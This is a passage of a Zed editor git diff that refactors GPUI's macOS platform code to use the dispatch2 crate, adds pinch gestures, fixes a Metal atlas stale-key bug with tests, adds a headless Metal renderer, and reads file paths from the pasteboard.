button_layout_changed) = settings + .receive_setting_changed_with_args( + "org.gnome.desktop.wm.preferences", + "button-layout", + ) + .await + { + let sender = sender.clone(); + background + .spawn(async move { + while let Some(layout) = button_layout_changed.next().await { + let layout 
= layout?; + sender.send(Event::ButtonLayout(layout))?; + } + anyhow::Ok(()) + }) + .detach(); + } + let mut appearance_changed = settings.receive_color_scheme_changed().await?; while let Some(scheme) = appearance_changed.next().await { sender.send(Event::WindowAppearance( diff --git a/crates/gpui_macos/Cargo.toml b/crates/gpui_macos/Cargo.toml index 4aedb1f4f1bed02e22f0dc6a881d60cc39ddd3a1..3626bbd05e8a7c7fa2ae577f11e5277da995d2f7 100644 --- a/crates/gpui_macos/Cargo.toml +++ b/crates/gpui_macos/Cargo.toml @@ -34,6 +34,7 @@ core-text = "21" core-video.workspace = true ctor.workspace = true derive_more.workspace = true +dispatch2 = "0.3.1" etagere = "0.2" # WARNING: If you change this, you must also publish a new version of zed-font-kit to crates.io font-kit = { git = "https://github.com/zed-industries/font-kit", rev = "110523127440aefb11ce0cf280ae7c5071337ec5", package = "zed-font-kit", version = "0.14.1-zed", optional = true } @@ -47,6 +48,7 @@ mach2.workspace = true media.workspace = true metal.workspace = true objc.workspace = true +objc2-app-kit.workspace = true parking_lot.workspace = true pathfinder_geometry = "0.5" raw-window-handle = "0.6" @@ -57,6 +59,5 @@ util.workspace = true uuid.workspace = true [target.'cfg(target_os = "macos")'.build-dependencies] -bindgen = "0.71" cbindgen = { version = "0.28.0", default-features = false } -gpui.workspace = true \ No newline at end of file +gpui.workspace = true diff --git a/crates/gpui_macos/build.rs b/crates/gpui_macos/build.rs index 32dfc571d257495c9c0a8cae54bc9fb567b51489..d5c1893f4ce18190a546aed1a708685cf66dc0e9 100644 --- a/crates/gpui_macos/build.rs +++ b/crates/gpui_macos/build.rs @@ -15,8 +15,6 @@ mod macos_build { use cbindgen::Config; pub fn run() { - generate_dispatch_bindings(); - let header_path = generate_shader_bindings(); #[cfg(feature = "runtime_shaders")] @@ -25,39 +23,6 @@ mod macos_build { compile_metal_shaders(&header_path); } - fn generate_dispatch_bindings() { - 
println!("cargo:rustc-link-lib=framework=System"); - - let bindings = bindgen::Builder::default() - .header("src/dispatch.h") - .allowlist_var("_dispatch_main_q") - .allowlist_var("_dispatch_source_type_data_add") - .allowlist_var("DISPATCH_QUEUE_PRIORITY_HIGH") - .allowlist_var("DISPATCH_QUEUE_PRIORITY_DEFAULT") - .allowlist_var("DISPATCH_QUEUE_PRIORITY_LOW") - .allowlist_var("DISPATCH_TIME_NOW") - .allowlist_function("dispatch_get_global_queue") - .allowlist_function("dispatch_async_f") - .allowlist_function("dispatch_after_f") - .allowlist_function("dispatch_time") - .allowlist_function("dispatch_source_merge_data") - .allowlist_function("dispatch_source_create") - .allowlist_function("dispatch_source_set_event_handler_f") - .allowlist_function("dispatch_resume") - .allowlist_function("dispatch_suspend") - .allowlist_function("dispatch_source_cancel") - .allowlist_function("dispatch_set_context") - .parse_callbacks(Box::new(bindgen::CargoCallbacks::new())) - .layout_tests(false) - .generate() - .expect("unable to generate bindings"); - - let out_path = PathBuf::from(env::var("OUT_DIR").unwrap()); - bindings - .write_to_file(out_path.join("dispatch_sys.rs")) - .expect("couldn't write dispatch bindings"); - } - fn generate_shader_bindings() -> PathBuf { let output_path = PathBuf::from(env::var("OUT_DIR").unwrap()).join("scene.h"); diff --git a/crates/gpui_macos/src/dispatch.h b/crates/gpui_macos/src/dispatch.h deleted file mode 100644 index 54f3818738042b00938ad566ec0269fc0d80241d..0000000000000000000000000000000000000000 --- a/crates/gpui_macos/src/dispatch.h +++ /dev/null @@ -1,2 +0,0 @@ -#include -#include diff --git a/crates/gpui_macos/src/dispatcher.rs b/crates/gpui_macos/src/dispatcher.rs index 755016e44be84f585631fbf311ef499adfc69367..f4b80ec7cbaf6deeebad1f7b6448463c9e132afe 100644 --- a/crates/gpui_macos/src/dispatcher.rs +++ b/crates/gpui_macos/src/dispatcher.rs @@ -1,10 +1,7 @@ -#![allow(non_upper_case_globals)] -#![allow(non_camel_case_types)] 
-#![allow(non_snake_case)] - +use dispatch2::{DispatchQueue, DispatchQueueGlobalPriority, DispatchTime, GlobalQueueIdentifier}; use gpui::{ - GLOBAL_THREAD_TIMINGS, PlatformDispatcher, Priority, RunnableMeta, RunnableVariant, - THREAD_TIMINGS, TaskTiming, ThreadTaskTimings, + GLOBAL_THREAD_TIMINGS, PlatformDispatcher, Priority, RunnableMeta, RunnableVariant, TaskTiming, + ThreadTaskTimings, add_task_timing, }; use mach2::{ kern_return::KERN_SUCCESS, @@ -26,21 +23,10 @@ use objc::{ }; use std::{ ffi::c_void, - ptr::{NonNull, addr_of}, + ptr::NonNull, time::{Duration, Instant}, }; -/// All items in the generated file are marked as pub, so we're gonna wrap it in a separate mod to prevent -/// these pub items from leaking into public API. -pub(crate) mod dispatch_sys { - include!(concat!(env!("OUT_DIR"), "/dispatch_sys.rs")); -} - -use dispatch_sys::*; -pub(crate) fn dispatch_get_main_queue() -> dispatch_queue_t { - addr_of!(_dispatch_main_q) as *const _ as dispatch_queue_t -} - pub(crate) struct MacDispatcher; impl MacDispatcher { @@ -56,25 +42,7 @@ impl PlatformDispatcher for MacDispatcher { } fn get_current_thread_timings(&self) -> ThreadTaskTimings { - THREAD_TIMINGS.with(|timings| { - let timings = timings.lock(); - let thread_name = timings.thread_name.clone(); - let total_pushed = timings.total_pushed; - let timings = &timings.timings; - - let mut vec = Vec::with_capacity(timings.len()); - - let (s1, s2) = timings.as_slices(); - vec.extend_from_slice(s1); - vec.extend_from_slice(s2); - - ThreadTaskTimings { - thread_name, - thread_id: std::thread::current().id(), - timings: vec, - total_pushed, - } - }) + gpui::profiler::get_current_thread_task_timings() } fn is_main_thread(&self) -> bool { @@ -89,43 +57,32 @@ impl PlatformDispatcher for MacDispatcher { Priority::RealtimeAudio => { panic!("RealtimeAudio priority should use spawn_realtime, not dispatch") } - Priority::High => DISPATCH_QUEUE_PRIORITY_HIGH as isize, - Priority::Medium => 
DISPATCH_QUEUE_PRIORITY_DEFAULT as isize, - Priority::Low => DISPATCH_QUEUE_PRIORITY_LOW as isize, + Priority::High => DispatchQueueGlobalPriority::High, + Priority::Medium => DispatchQueueGlobalPriority::Default, + Priority::Low => DispatchQueueGlobalPriority::Low, }; unsafe { - dispatch_async_f( - dispatch_get_global_queue(queue_priority, 0), - context, - Some(trampoline as unsafe extern "C" fn(*mut c_void)), - ); + DispatchQueue::global_queue(GlobalQueueIdentifier::Priority(queue_priority)) + .exec_async_f(context, trampoline); } } fn dispatch_on_main_thread(&self, runnable: RunnableVariant, _priority: Priority) { let context = runnable.into_raw().as_ptr() as *mut c_void; unsafe { - dispatch_async_f( - dispatch_get_main_queue(), - context, - Some(trampoline as unsafe extern "C" fn(*mut c_void)), - ); + DispatchQueue::main().exec_async_f(context, trampoline); } } fn dispatch_after(&self, duration: Duration, runnable: RunnableVariant) { let context = runnable.into_raw().as_ptr() as *mut c_void; + let queue = DispatchQueue::global_queue(GlobalQueueIdentifier::Priority( + DispatchQueueGlobalPriority::High, + )); + let when = DispatchTime::NOW.time(duration.as_nanos() as i64); unsafe { - let queue = - dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH.try_into().unwrap(), 0); - let when = dispatch_time(DISPATCH_TIME_NOW as u64, duration.as_nanos() as i64); - dispatch_after_f( - when, - queue, - context, - Some(trampoline as unsafe extern "C" fn(*mut c_void)), - ); + DispatchQueue::exec_after_f(when, &queue, context, trampoline); } } @@ -226,43 +183,19 @@ extern "C" fn trampoline(context: *mut c_void) { let runnable = unsafe { Runnable::::from_raw(NonNull::new_unchecked(context as *mut ())) }; - let metadata = runnable.metadata(); - - // Check if the executor that spawned this task was closed - if metadata.is_closed() { - return; - } - - let location = metadata.location; + let location = runnable.metadata().location; let start = Instant::now(); - let timing = 
TaskTiming { + let mut timing = TaskTiming { location, start, end: None, }; - THREAD_TIMINGS.with(|timings| { - let mut timings = timings.lock(); - let timings = &mut timings.timings; - if let Some(last_timing) = timings.iter_mut().rev().next() { - if last_timing.location == timing.location { - return; - } - } - - timings.push_back(timing); - }); + add_task_timing(timing); runnable.run(); - let end = Instant::now(); - THREAD_TIMINGS.with(|timings| { - let mut timings = timings.lock(); - let timings = &mut timings.timings; - let Some(last_timing) = timings.iter_mut().rev().next() else { - return; - }; - last_timing.end = Some(end); - }); + timing.end = Some(Instant::now()); + add_task_timing(timing); } diff --git a/crates/gpui_macos/src/display_link.rs b/crates/gpui_macos/src/display_link.rs index b086cc1b12182db661e5fa1cb82b671c7fd5b8bc..86e9b4072bab3cfb7cf5d0d69bc6ca29ad15cbb1 100644 --- a/crates/gpui_macos/src/display_link.rs +++ b/crates/gpui_macos/src/display_link.rs @@ -1,26 +1,21 @@ -use crate::{ - dispatch_get_main_queue, - dispatcher::dispatch_sys::{ - _dispatch_source_type_data_add, dispatch_resume, dispatch_set_context, - dispatch_source_cancel, dispatch_source_create, dispatch_source_merge_data, - dispatch_source_set_event_handler_f, dispatch_source_t, dispatch_suspend, - }, -}; use anyhow::Result; use core_graphics::display::CGDirectDisplayID; +use dispatch2::{ + _dispatch_source_type_data_add, DispatchObject, DispatchQueue, DispatchRetained, DispatchSource, +}; use std::ffi::c_void; use util::ResultExt; pub struct DisplayLink { display_link: Option, - frame_requests: dispatch_source_t, + frame_requests: DispatchRetained, } impl DisplayLink { pub fn new( display_id: CGDirectDisplayID, data: *mut c_void, - callback: unsafe extern "C" fn(*mut c_void), + callback: extern "C" fn(*mut c_void), ) -> Result { unsafe extern "C" fn display_link_callback( _display_link_out: *mut sys::CVDisplayLink, @@ -31,31 +26,27 @@ impl DisplayLink { frame_requests: *mut 
c_void, ) -> i32 { unsafe { - let frame_requests = frame_requests as dispatch_source_t; - dispatch_source_merge_data(frame_requests, 1); + let frame_requests = &*(frame_requests as *const DispatchSource); + frame_requests.merge_data(1); 0 } } unsafe { - let frame_requests = dispatch_source_create( - &_dispatch_source_type_data_add, + let frame_requests = DispatchSource::new( + &raw const _dispatch_source_type_data_add as *mut _, 0, 0, - dispatch_get_main_queue(), - ); - dispatch_set_context( - crate::dispatch_sys::dispatch_object_t { - _ds: frame_requests, - }, - data, + Some(DispatchQueue::main()), ); - dispatch_source_set_event_handler_f(frame_requests, Some(callback)); + frame_requests.set_context(data); + frame_requests.set_event_handler_f(callback); + frame_requests.resume(); let display_link = sys::DisplayLink::new( display_id, display_link_callback, - frame_requests as *mut c_void, + &*frame_requests as *const DispatchSource as *mut c_void, )?; Ok(Self { @@ -67,9 +58,6 @@ impl DisplayLink { pub fn start(&mut self) -> Result<()> { unsafe { - dispatch_resume(crate::dispatch_sys::dispatch_object_t { - _ds: self.frame_requests, - }); self.display_link.as_mut().unwrap().start()?; } Ok(()) @@ -77,9 +65,6 @@ impl DisplayLink { pub fn stop(&mut self) -> Result<()> { unsafe { - dispatch_suspend(crate::dispatch_sys::dispatch_object_t { - _ds: self.frame_requests, - }); self.display_link.as_mut().unwrap().stop()?; } Ok(()) @@ -97,9 +82,7 @@ impl Drop for DisplayLink { // // We might also want to upgrade to CADisplayLink, but that requires dropping old macOS support. 
std::mem::forget(self.display_link.take()); - unsafe { - dispatch_source_cancel(self.frame_requests); - } + self.frame_requests.cancel(); } } diff --git a/crates/gpui_macos/src/events.rs b/crates/gpui_macos/src/events.rs index 5970488a17fbf9395f4ba29f5b98a135f6d55f7f..71bcb105e8aa8c6c43fd5b7864881535454c5ec3 100644 --- a/crates/gpui_macos/src/events.rs +++ b/crates/gpui_macos/src/events.rs @@ -1,8 +1,8 @@ use gpui::{ Capslock, KeyDownEvent, KeyUpEvent, Keystroke, Modifiers, ModifiersChangedEvent, MouseButton, MouseDownEvent, MouseExitEvent, MouseMoveEvent, MousePressureEvent, MouseUpEvent, - NavigationDirection, Pixels, PlatformInput, PressureStage, ScrollDelta, ScrollWheelEvent, - TouchPhase, point, px, + NavigationDirection, PinchEvent, Pixels, PlatformInput, PressureStage, ScrollDelta, + ScrollWheelEvent, TouchPhase, point, px, }; use crate::{ @@ -234,6 +234,27 @@ pub(crate) unsafe fn platform_input_from_native( _ => None, } } + NSEventType::NSEventTypeMagnify => window_height.map(|window_height| { + let phase = match native_event.phase() { + NSEventPhase::NSEventPhaseMayBegin | NSEventPhase::NSEventPhaseBegan => { + TouchPhase::Started + } + NSEventPhase::NSEventPhaseEnded => TouchPhase::Ended, + _ => TouchPhase::Moved, + }; + + let magnification = native_event.magnification() as f32; + + PlatformInput::Pinch(PinchEvent { + position: point( + px(native_event.locationInWindow().x as f32), + window_height - px(native_event.locationInWindow().y as f32), + ), + delta: magnification, + modifiers: read_modifiers(native_event), + phase, + }) + }), NSEventType::NSScrollWheel => window_height.map(|window_height| { let phase = match native_event.phase() { NSEventPhase::NSEventPhaseMayBegin | NSEventPhase::NSEventPhaseBegan => { diff --git a/crates/gpui_macos/src/metal_atlas.rs b/crates/gpui_macos/src/metal_atlas.rs index eacd9407fe2e447abbd05dc8cdb2e9f7660cf3cf..e6b8443c520e1b47006104085fdc26a5415d85f6 100644 --- a/crates/gpui_macos/src/metal_atlas.rs +++ 
b/crates/gpui_macos/src/metal_atlas.rs @@ -61,7 +61,7 @@ impl PlatformAtlas for MetalAtlas { fn remove(&self, key: &AtlasKey) { let mut lock = self.0.lock(); - let Some(id) = lock.tiles_by_key.get(key).map(|v| v.texture_id) else { + let Some(id) = lock.tiles_by_key.remove(key).map(|v| v.texture_id) else { return; }; @@ -81,10 +81,8 @@ impl PlatformAtlas for MetalAtlas { if let Some(mut texture) = texture_slot.take() { texture.decrement_ref_count(); - if texture.is_unreferenced() { textures.free_list.push(id.index as usize); - lock.tiles_by_key.remove(key); } else { *texture_slot = Some(texture); } @@ -271,3 +269,81 @@ fn point_from_etagere(value: etagere::Point) -> Point { struct AssertSend(T); unsafe impl Send for AssertSend {} + +#[cfg(test)] +mod tests { + use super::*; + use gpui::PlatformAtlas; + use std::borrow::Cow; + + fn create_atlas() -> Option { + let device = metal::Device::system_default()?; + Some(MetalAtlas::new(device, true)) + } + + fn make_image_key(image_id: usize, frame_index: usize) -> AtlasKey { + AtlasKey::Image(gpui::RenderImageParams { + image_id: gpui::ImageId(image_id), + frame_index, + }) + } + + fn insert_tile(atlas: &MetalAtlas, key: &AtlasKey, size: Size) -> AtlasTile { + atlas + .get_or_insert_with(key, &mut || { + let byte_count = (size.width.0 as usize) * (size.height.0 as usize) * 4; + Ok(Some((size, Cow::Owned(vec![0u8; byte_count])))) + }) + .expect("allocation should succeed") + .expect("callback returns Some") + } + + #[test] + fn test_remove_clears_stale_keys_from_tiles_by_key() { + let Some(atlas) = create_atlas() else { + return; + }; + + let small = Size { + width: DevicePixels(64), + height: DevicePixels(64), + }; + + let key_a = make_image_key(1, 0); + let key_b = make_image_key(2, 0); + let key_c = make_image_key(3, 0); + + let tile_a = insert_tile(&atlas, &key_a, small); + let tile_b = insert_tile(&atlas, &key_b, small); + let tile_c = insert_tile(&atlas, &key_c, small); + + assert_eq!(tile_a.texture_id, 
tile_b.texture_id); + assert_eq!(tile_b.texture_id, tile_c.texture_id); + + // Remove A: texture still has B and C, so it stays. + // The key for A must be removed from tiles_by_key. + atlas.remove(&key_a); + + // Remove B: texture still has C. + atlas.remove(&key_b); + + // Remove C: texture becomes unreferenced and is deleted. + atlas.remove(&key_c); + + // Re-inserting A must allocate a fresh tile on a new texture, + // NOT return a stale tile referencing the deleted texture. + let tile_a2 = insert_tile(&atlas, &key_a, small); + + // The texture must actually exist — this would panic before the fix. + let _texture = atlas.metal_texture(tile_a2.texture_id); + } + + #[test] + fn test_remove_nonexistent_key_is_noop() { + let Some(atlas) = create_atlas() else { + return; + }; + let key = make_image_key(999, 0); + atlas.remove(&key); + } +} diff --git a/crates/gpui_macos/src/metal_renderer.rs b/crates/gpui_macos/src/metal_renderer.rs index 93e039019b1ca639118b5453ff8f9de0d30e4f99..e96d14b15691bec1da54aa9d46e3e765218292b2 100644 --- a/crates/gpui_macos/src/metal_renderer.rs +++ b/crates/gpui_macos/src/metal_renderer.rs @@ -110,10 +110,12 @@ impl InstanceBufferPool { pub(crate) struct MetalRenderer { device: metal::Device, - layer: metal::MetalLayer, + layer: Option, is_apple_gpu: bool, is_unified_memory: bool, presents_with_transaction: bool, + /// For headless rendering, tracks whether output should be opaque + opaque: bool, command_queue: CommandQueue, paths_rasterization_pipeline_state: metal::RenderPipelineState, path_sprites_pipeline_state: metal::RenderPipelineState, @@ -142,26 +144,9 @@ pub struct PathRasterizationVertex { } impl MetalRenderer { + /// Creates a new MetalRenderer with a CAMetalLayer for window-based rendering. pub fn new(instance_buffer_pool: Arc>, transparent: bool) -> Self { - // Prefer low‐power integrated GPUs on Intel Mac. On Apple - // Silicon, there is only ever one GPU, so this is equivalent to - // `metal::Device::system_default()`. 
- let device = if let Some(d) = metal::Device::all() - .into_iter() - .min_by_key(|d| (d.is_removable(), !d.is_low_power())) - { - d - } else { - // For some reason `all()` can return an empty list, see https://github.com/zed-industries/zed/issues/37689 - // In that case, we fall back to the system default device. - log::error!( - "Unable to enumerate Metal devices; attempting to use system default device" - ); - metal::Device::system_default().unwrap_or_else(|| { - log::error!("unable to access a compatible graphics device"); - std::process::exit(1); - }) - }; + let device = Self::create_device(); let layer = metal::MetalLayer::new(); layer.set_device(&device); @@ -182,6 +167,48 @@ impl MetalRenderer { | AutoresizingMask::HEIGHT_SIZABLE ]; } + + Self::new_internal(device, Some(layer), !transparent, instance_buffer_pool) + } + + /// Creates a new headless MetalRenderer for offscreen rendering without a window. + /// + /// This renderer can render scenes to images without requiring a CAMetalLayer, + /// window, or AppKit. Use `render_scene_to_image()` to render scenes. + #[cfg(any(test, feature = "test-support"))] + pub fn new_headless(instance_buffer_pool: Arc>) -> Self { + let device = Self::create_device(); + Self::new_internal(device, None, true, instance_buffer_pool) + } + + fn create_device() -> metal::Device { + // Prefer low‐power integrated GPUs on Intel Mac. On Apple + // Silicon, there is only ever one GPU, so this is equivalent to + // `metal::Device::system_default()`. + if let Some(d) = metal::Device::all() + .into_iter() + .min_by_key(|d| (d.is_removable(), !d.is_low_power())) + { + d + } else { + // For some reason `all()` can return an empty list, see https://github.com/zed-industries/zed/issues/37689 + // In that case, we fall back to the system default device. 
+ log::error!( + "Unable to enumerate Metal devices; attempting to use system default device" + ); + metal::Device::system_default().unwrap_or_else(|| { + log::error!("unable to access a compatible graphics device"); + std::process::exit(1); + }) + } + } + + fn new_internal( + device: metal::Device, + layer: Option, + opaque: bool, + instance_buffer_pool: Arc>, + ) -> Self { #[cfg(feature = "runtime_shaders")] let library = device .new_library_with_source(&SHADERS_SOURCE_FILE, &metal::CompileOptions::new()) @@ -303,6 +330,7 @@ impl MetalRenderer { presents_with_transaction: false, is_apple_gpu, is_unified_memory, + opaque, command_queue, paths_rasterization_pipeline_state, path_sprites_pipeline_state, @@ -322,12 +350,15 @@ impl MetalRenderer { } } - pub fn layer(&self) -> &metal::MetalLayerRef { - &self.layer + pub fn layer(&self) -> Option<&metal::MetalLayerRef> { + self.layer.as_ref().map(|l| l.as_ref()) } pub fn layer_ptr(&self) -> *mut CAMetalLayer { - self.layer.as_ptr() + self.layer + .as_ref() + .map(|l| l.as_ptr()) + .unwrap_or(ptr::null_mut()) } pub fn sprite_atlas(&self) -> &Arc { @@ -336,26 +367,25 @@ impl MetalRenderer { pub fn set_presents_with_transaction(&mut self, presents_with_transaction: bool) { self.presents_with_transaction = presents_with_transaction; - self.layer - .set_presents_with_transaction(presents_with_transaction); + if let Some(layer) = &self.layer { + layer.set_presents_with_transaction(presents_with_transaction); + } } pub fn update_drawable_size(&mut self, size: Size) { - let size = NSSize { - width: size.width.0 as f64, - height: size.height.0 as f64, - }; - unsafe { - let _: () = msg_send![ - self.layer(), - setDrawableSize: size - ]; + if let Some(layer) = &self.layer { + let ns_size = NSSize { + width: size.width.0 as f64, + height: size.height.0 as f64, + }; + unsafe { + let _: () = msg_send![ + layer.as_ref(), + setDrawableSize: ns_size + ]; + } } - let device_pixels_size = Size { - width: DevicePixels(size.width as i32), - 
height: DevicePixels(size.height as i32), - }; - self.update_path_intermediate_textures(device_pixels_size); + self.update_path_intermediate_textures(size); } fn update_path_intermediate_textures(&mut self, size: Size) { @@ -396,8 +426,11 @@ impl MetalRenderer { } } - pub fn update_transparency(&self, transparent: bool) { - self.layer.set_opaque(!transparent); + pub fn update_transparency(&mut self, transparent: bool) { + self.opaque = !transparent; + if let Some(layer) = &self.layer { + layer.set_opaque(!transparent); + } } pub fn destroy(&self) { @@ -405,7 +438,15 @@ impl MetalRenderer { } pub fn draw(&mut self, scene: &Scene) { - let layer = self.layer.clone(); + let layer = match &self.layer { + Some(l) => l.clone(), + None => { + log::error!( + "draw() called on headless renderer - use render_scene_to_image() instead" + ); + return; + } + }; let viewport_size = layer.drawable_size(); let viewport_size: Size = size( (viewport_size.width.ceil() as i32).into(), @@ -476,9 +517,15 @@ impl MetalRenderer { /// Renders the scene to a texture and returns the pixel data as an RGBA image. /// This does not present the frame to screen - useful for visual testing /// where we want to capture what would be rendered without displaying it. + /// + /// Note: This requires a layer-backed renderer. For headless rendering, + /// use `render_scene_to_image()` instead. #[cfg(any(test, feature = "test-support"))] pub fn render_to_image(&mut self, scene: &Scene) -> Result { - let layer = self.layer.clone(); + let layer = self + .layer + .clone() + .ok_or_else(|| anyhow::anyhow!("render_to_image requires a layer-backed renderer"))?; let viewport_size = layer.drawable_size(); let viewport_size: Size = size( (viewport_size.width.ceil() as i32).into(), @@ -567,21 +614,146 @@ impl MetalRenderer { } } + /// Renders a scene to an image without requiring a window or CAMetalLayer. + /// + /// This is the primary method for headless rendering. 
It creates an offscreen + /// texture, renders the scene to it, and returns the pixel data as an RGBA image. + #[cfg(any(test, feature = "test-support"))] + pub fn render_scene_to_image( + &mut self, + scene: &Scene, + size: Size, + ) -> Result { + if size.width.0 <= 0 || size.height.0 <= 0 { + anyhow::bail!("Invalid size for render_scene_to_image: {:?}", size); + } + + // Update path intermediate textures for this size + self.update_path_intermediate_textures(size); + + // Create an offscreen texture as render target + let texture_descriptor = metal::TextureDescriptor::new(); + texture_descriptor.set_width(size.width.0 as u64); + texture_descriptor.set_height(size.height.0 as u64); + texture_descriptor.set_pixel_format(MTLPixelFormat::BGRA8Unorm); + texture_descriptor + .set_usage(metal::MTLTextureUsage::RenderTarget | metal::MTLTextureUsage::ShaderRead); + texture_descriptor.set_storage_mode(metal::MTLStorageMode::Managed); + let target_texture = self.device.new_texture(&texture_descriptor); + + loop { + let mut instance_buffer = self + .instance_buffer_pool + .lock() + .acquire(&self.device, self.is_unified_memory); + + let command_buffer = + self.draw_primitives_to_texture(scene, &mut instance_buffer, &target_texture, size); + + match command_buffer { + Ok(command_buffer) => { + let instance_buffer_pool = self.instance_buffer_pool.clone(); + let instance_buffer = Cell::new(Some(instance_buffer)); + let block = ConcreteBlock::new(move |_| { + if let Some(instance_buffer) = instance_buffer.take() { + instance_buffer_pool.lock().release(instance_buffer); + } + }); + let block = block.copy(); + command_buffer.add_completed_handler(&block); + + // On discrete GPUs (non-unified memory), Managed textures + // require an explicit blit synchronize before the CPU can + // read back the rendered data. Without this, get_bytes + // returns stale zeros. 
+ if !self.is_unified_memory { + let blit = command_buffer.new_blit_command_encoder(); + blit.synchronize_resource(&target_texture); + blit.end_encoding(); + } + + // Commit and wait for completion + command_buffer.commit(); + command_buffer.wait_until_completed(); + + // Read pixels from the texture + let width = size.width.0 as u32; + let height = size.height.0 as u32; + let bytes_per_row = width as usize * 4; + let buffer_size = height as usize * bytes_per_row; + + let mut pixels = vec![0u8; buffer_size]; + + let region = metal::MTLRegion { + origin: metal::MTLOrigin { x: 0, y: 0, z: 0 }, + size: metal::MTLSize { + width: width as u64, + height: height as u64, + depth: 1, + }, + }; + + target_texture.get_bytes( + pixels.as_mut_ptr() as *mut std::ffi::c_void, + bytes_per_row as u64, + region, + 0, + ); + + // Convert BGRA to RGBA (swap B and R channels) + for chunk in pixels.chunks_exact_mut(4) { + chunk.swap(0, 2); + } + + return RgbaImage::from_raw(width, height, pixels).ok_or_else(|| { + anyhow::anyhow!("Failed to create RgbaImage from pixel data") + }); + } + Err(err) => { + log::error!( + "failed to render: {}. 
retrying with larger instance buffer size", + err + ); + let mut instance_buffer_pool = self.instance_buffer_pool.lock(); + let buffer_size = instance_buffer_pool.buffer_size; + if buffer_size >= 256 * 1024 * 1024 { + anyhow::bail!("instance buffer size grew too large: {}", buffer_size); + } + instance_buffer_pool.reset(buffer_size * 2); + log::info!( + "increased instance buffer size to {}", + instance_buffer_pool.buffer_size + ); + } + } + } + } + fn draw_primitives( &mut self, scene: &Scene, instance_buffer: &mut InstanceBuffer, drawable: &metal::MetalDrawableRef, viewport_size: Size, + ) -> Result { + self.draw_primitives_to_texture(scene, instance_buffer, drawable.texture(), viewport_size) + } + + fn draw_primitives_to_texture( + &mut self, + scene: &Scene, + instance_buffer: &mut InstanceBuffer, + texture: &metal::TextureRef, + viewport_size: Size, ) -> Result { let command_queue = self.command_queue.clone(); let command_buffer = command_queue.new_command_buffer(); - let alpha = if self.layer.is_opaque() { 1. } else { 0. }; + let alpha = if self.opaque { 1. } else { 0. 
}; let mut instance_offset = 0; - let mut command_encoder = new_command_encoder( + let mut command_encoder = new_command_encoder_for_texture( command_buffer, - drawable, + texture, viewport_size, |color_attachment| { color_attachment.set_load_action(metal::MTLLoadAction::Clear); @@ -617,9 +789,9 @@ impl MetalRenderer { command_buffer, ); - command_encoder = new_command_encoder( + command_encoder = new_command_encoder_for_texture( command_buffer, - drawable, + texture, viewport_size, |color_attachment| { color_attachment.set_load_action(metal::MTLLoadAction::Load); @@ -1309,9 +1481,9 @@ impl MetalRenderer { } } -fn new_command_encoder<'a>( +fn new_command_encoder_for_texture<'a>( command_buffer: &'a metal::CommandBufferRef, - drawable: &'a metal::MetalDrawableRef, + texture: &'a metal::TextureRef, viewport_size: Size, configure_color_attachment: impl Fn(&RenderPassColorAttachmentDescriptorRef), ) -> &'a metal::RenderCommandEncoderRef { @@ -1320,7 +1492,7 @@ fn new_command_encoder<'a>( .color_attachments() .object_at(0) .unwrap(); - color_attachment.set_texture(Some(drawable.texture())); + color_attachment.set_texture(Some(texture)); color_attachment.set_store_action(metal::MTLStoreAction::Store); configure_color_attachment(color_attachment); @@ -1506,3 +1678,32 @@ pub struct SurfaceBounds { pub bounds: Bounds, pub content_mask: ContentMask, } + +#[cfg(any(test, feature = "test-support"))] +pub struct MetalHeadlessRenderer { + renderer: MetalRenderer, +} + +#[cfg(any(test, feature = "test-support"))] +impl MetalHeadlessRenderer { + pub fn new() -> Self { + let instance_buffer_pool = Arc::new(Mutex::new(InstanceBufferPool::default())); + let renderer = MetalRenderer::new_headless(instance_buffer_pool); + Self { renderer } + } +} + +#[cfg(any(test, feature = "test-support"))] +impl gpui::PlatformHeadlessRenderer for MetalHeadlessRenderer { + fn render_scene_to_image( + &mut self, + scene: &Scene, + size: Size, + ) -> anyhow::Result { + 
self.renderer.render_scene_to_image(scene, size) + } + + fn sprite_atlas(&self) -> Arc { + self.renderer.sprite_atlas().clone() + } +} diff --git a/crates/gpui_macos/src/pasteboard.rs b/crates/gpui_macos/src/pasteboard.rs index aceb635194402cdb203aed0f27aae78fa42be32d..d8b7f5627ddc44bea867132c91216b00729488d9 100644 --- a/crates/gpui_macos/src/pasteboard.rs +++ b/crates/gpui_macos/src/pasteboard.rs @@ -1,16 +1,23 @@ use core::slice; -use std::ffi::c_void; +use std::ffi::{CStr, c_void}; +use std::path::PathBuf; use cocoa::{ - appkit::{NSPasteboard, NSPasteboardTypePNG, NSPasteboardTypeString, NSPasteboardTypeTIFF}, + appkit::{ + NSFilenamesPboardType, NSPasteboard, NSPasteboardTypePNG, NSPasteboardTypeString, + NSPasteboardTypeTIFF, + }, base::{id, nil}, - foundation::NSData, + foundation::{NSArray, NSData, NSFastEnumeration, NSString}, }; use objc::{msg_send, runtime::Object, sel, sel_impl}; +use smallvec::SmallVec; use strum::IntoEnumIterator as _; use crate::ns_string; -use gpui::{ClipboardEntry, ClipboardItem, ClipboardString, Image, ImageFormat, hash}; +use gpui::{ + ClipboardEntry, ClipboardItem, ClipboardString, ExternalPaths, Image, ImageFormat, hash, +}; pub struct Pasteboard { inner: id, @@ -41,28 +48,37 @@ impl Pasteboard { } pub fn read(&self) -> Option { - // First, see if it's a string. 
unsafe { - let pasteboard_types: id = self.inner.types(); - let string_type: id = ns_string("public.utf8-plain-text"); + // Check for file paths first + let filenames = NSPasteboard::propertyListForType(self.inner, NSFilenamesPboardType); + if filenames != nil && NSArray::count(filenames) > 0 { + let mut paths = SmallVec::new(); + for file in filenames.iter() { + let f = NSString::UTF8String(file); + let path = CStr::from_ptr(f).to_string_lossy().into_owned(); + paths.push(PathBuf::from(path)); + } + if !paths.is_empty() { + let mut entries = vec![ClipboardEntry::ExternalPaths(ExternalPaths(paths))]; + + // Also include the string representation so text editors can + // paste the path as text. + if let Some(string_item) = self.read_string_from_pasteboard() { + entries.push(string_item); + } - if msg_send![pasteboard_types, containsObject: string_type] { - let data = self.inner.dataForType(string_type); - if data == nil { - return None; - } else if data.bytes().is_null() { - // https://developer.apple.com/documentation/foundation/nsdata/1410616-bytes?language=objc - // "If the length of the NSData object is 0, this property returns nil." - return Some(self.read_string(&[])); - } else { - let bytes = - slice::from_raw_parts(data.bytes() as *mut u8, data.length() as usize); - - return Some(self.read_string(bytes)); + return Some(ClipboardItem { entries }); } } - // If it wasn't a string, try the various supported image types. + // Next, check for a plain string. + if let Some(string_entry) = self.read_string_from_pasteboard() { + return Some(ClipboardItem { + entries: vec![string_entry], + }); + } + + // 